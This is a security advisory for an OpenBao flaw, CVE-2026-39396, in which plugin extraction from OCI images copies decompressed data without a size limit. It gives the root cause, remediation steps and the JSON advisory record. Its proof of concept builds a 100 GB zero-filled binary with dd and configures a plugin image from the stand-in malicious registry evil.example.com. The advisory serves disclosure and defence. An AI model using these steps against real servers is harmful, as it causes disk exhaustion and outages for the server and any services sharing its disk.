GHSA-R65V-XGWC-G56J

Vulnerability from github – Published: 2026-04-21 18:24 – Updated: 2026-04-21 18:24
VLAI?
Summary
OpenBao: Decompression Bomb via Unbounded Copy in OCI Plugin Extraction (DoS)
Details

Summary

ExtractPluginFromImage() in OpenBao's OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via io.Copy with no upper bound on the number of bytes written. An attacker who controls or compromises the OCI registry referenced in the victim's configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file.

The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace legit plugin image with no need to change its signature.

Details

Root cause

helper/pluginutil/oci/downloader.go:301:

if _, copyErr := io.Copy(outFile, tarReader); copyErr != nil {

io.Copy() reads until EOF with no size limit.
The tar header.Size field is never validated before the copy, and mutate.Extract decompresses all gzip layers in memory/streaming, resulting in unbounded decompression-to-disk.

PoC

  1. Set up a malicious OCI registry
  2. Create a decompression bomb binary: bash dd if=/dev/zero bs=1G count=100 > /tmp/bomb-binary
  3. Package it in a minimal OCI image
  4. Push to the malicious registry
  5. Configure victim OpenBao to use this registry: hcl plugin "secrets" "bomb" { image = "evil.example.com/plugin" version = "v1.0.0" binary_name = "openbao-plugin-secrets-bomb" sha256sum = "0000000000000000000000000000000000000000000000000000000000000000" } plugin_auto_download = true
  6. Start OpenBao (or trigger SIGHUP), load OCI image, disk fill -> cause DoS

Impact

  • Denial of Service: Disk exhaustion on the OpenBao server
  • Cascading failure: Co-located services (databases, other apps) also fail when the disk is full
  • Difficult recovery: If the process is killed mid-extraction, the partial file remains on disk and is not cleaned up
  • Repeated exploitation: On SIGHUP or restart with plugin_auto_download = true, the bomb is re-downloaded

Remediation

  1. Validate header.Size against a configurable maximum before opening the output file
  2. Wrap tarReader in io.LimitReader(tarReader, maxSize+1) and check bytes written after copy
  3. Add a max_size configuration field to PluginConfig for operator control (default: 1 GiB)
Severity ?
3.1 (Low)
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/openbao/openbao"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260420180337-2b2a901aa9f7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39396"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-674",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-21T18:24:10Z",
    "nvd_published_at": "2026-04-21T01:16:06Z",
    "severity": "LOW"
  },
  "details": "### Summary\n\n`ExtractPluginFromImage()` in OpenBao\u0027s OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via `io.Copy` with no upper bound on the number of bytes written.\nAn attacker who controls or compromises the OCI registry referenced in the victim\u0027s configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file.\n\nThe SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace **legit plugin image** with no need to change its signature.\n\n### Details\n\n#### Root cause\n\n`helper/pluginutil/oci/downloader.go:301`:\n\n```go\nif _, copyErr := io.Copy(outFile, tarReader); copyErr != nil {\n```\n\n`io.Copy()` reads until EOF with no size limit.  \nThe tar `header.Size` field is never validated before the copy, and `mutate.Extract` decompresses all gzip layers in memory/streaming, resulting in unbounded decompression-to-disk.\n\n### PoC\n\n1. Set up a malicious OCI registry\n2. Create a decompression bomb binary:\n   ```bash\n   dd if=/dev/zero bs=1G count=100 \u003e /tmp/bomb-binary\n   ```\n3. Package it in a minimal OCI image\n4. Push to the malicious registry\n5. Configure victim OpenBao to use this registry:\n   ```hcl\n   plugin \"secrets\" \"bomb\" {\n     image       = \"evil.example.com/plugin\"\n     version     = \"v1.0.0\"\n     binary_name = \"openbao-plugin-secrets-bomb\"\n     sha256sum   = \"0000000000000000000000000000000000000000000000000000000000000000\"\n   }\n   plugin_auto_download = true\n   ```\n6. Start OpenBao (or trigger SIGHUP), load OCI image, disk fill -\u003e cause DoS\n\n### Impact\n\n- Denial of Service: Disk exhaustion on the OpenBao server\n- Cascading failure: Co-located services (databases, other apps) also fail when the disk is full\n- Difficult recovery: If the process is killed mid-extraction, the partial file remains on disk and is not cleaned up\n- Repeated exploitation: On SIGHUP or restart with plugin_auto_download = true, the bomb is re-downloaded\n\n### Remediation\n\n1. Validate `header.Size` against a configurable maximum before opening the output file\n2. Wrap `tarReader` in `io.LimitReader(tarReader, maxSize+1)` and check bytes written after copy\n3. Add a max_size configuration field to PluginConfig for operator control (default: 1 GiB)",
  "id": "GHSA-r65v-xgwc-g56j",
  "modified": "2026-04-21T18:24:10Z",
  "published": "2026-04-21T18:24:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openbao/openbao/security/advisories/GHSA-r65v-xgwc-g56j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39396"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openbao/openbao/pull/2941"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openbao/openbao/commit/af576af5322c6552a017ad10fd76aa4f40fd021e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openbao/openbao"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openbao/openbao/releases/tag/v2.5.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenBao: Decompression Bomb via Unbounded Copy in OCI Plugin Extraction (DoS)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.